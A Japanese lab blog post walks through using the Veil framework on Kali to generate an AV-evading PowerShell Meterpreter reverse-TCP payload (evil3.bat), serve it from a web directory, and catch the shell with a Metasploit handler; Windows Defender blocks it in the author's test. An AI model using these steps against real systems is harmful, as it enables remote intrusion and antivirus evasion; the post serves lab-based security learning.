今回は「Veil Framework」というツールを用いて、Windows Defender を回避したいと思います。
Veil インストール
まず、Veil を Kali にインストールします。
root@kali:~/Downloads/Windows# apt install veil-evasion
その後 Veil を起動し、s を入力してサイレントインストールを行います。
root@kali:~/Downloads/Windows# veil
インストールが終わると「Veil>: 」のプロンプトが表示されるので、最新の状態にアップデートします。最新にすることでアンチウィルスソフトを回避できる確率が上がります。(今回は既に最新でした。)
Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
The following packages were automatically installed and are no longer required:
libdns1104 libexiv2-14 libgtkmm-2.4-1v5 libisc1100 libmysofa0 libradare2-3.9 python-asn1crypto python3-simplegeneric
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 307 not upgraded.
Veil has checked for updates, press enter to continue
Veil>:
Veil Evasion 使用
Veil の起動画面を見ればわかりますが、使用可能なツールとして以下の2つがあります。
Available Tools:
1) Evasion
2) Ordnance
今回はアンチウイルスソフトの回避を行うため、1のツールを使用します。
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
41 payloads loaded
Available Commands:
back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload
Veil/Evasion>:
ペイロードの選択
次にペイロードを選択します。「list」コマンドで使用可能なペイロードを表示させます。
Veil/Evasion>: list
---中略---
22) powershell/meterpreter/rev_tcp.py
いつも使用している meterpreter の reverse_tcp があったので、これを選択します。
Veil/Evasion>: use 22
そして、Kali の IP アドレスをセットします。
[powershell/meterpreter/rev_tcp>>]: set lhost 10.0.0.2
ペイロードの作成
generate コマンドで、先程設定したペイロードを作成できます。ファイル名を尋ねられるので指定します。ファイル名は今回「evil3」にしました。
[powershell/meterpreter/rev_tcp>>]: generate
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[>] Please enter the base name for output files (default is payload): evil3
これで evil3.bat というペイロードが作成されます。
ペイロードをWEBサーバに公開
作成した「evil3.bat」をWEBサーバの公開ディレクトリに配置します。
root@kali:~/Downloads/Windows# cp /var/lib/veil/output/source/evil3.bat /var/www/html/share/
Windows 10 から Kali の IP アドレス宛に http 接続すると、evil3.bat が公開されているので、ダウンロードします。

ペイロードの実行
Kali でまずセッションを待ち受けます。
作成したペイロードに合わせて「windows/meterpreter/reverce_tcp」でセッションを待ち受けます。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.2:4444
この状態で、Windows 10 で evil3.bat を実行します。
Windows Defender で警告が出ますが、詳細をクリックして実行します。

実行すると、Windows Defender によってファイルの実行に失敗してしまいました。

「ハッキングラボのつくりかた」ではセッションの確立に成功していましたが、残念ながら現在(2020/3/15)の Windows Defender は突破できませんでした。
Windows Defender のリアルタイム保護を都度オフにするのが非常に手間だったので、今回 Windows Defender を回避できるとワクワクしていましたが、またも阻まれてしまいました。
まだ回避する方法はあるようなので、次回に期待です。
今回は以上です。
くどり
この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。
コメント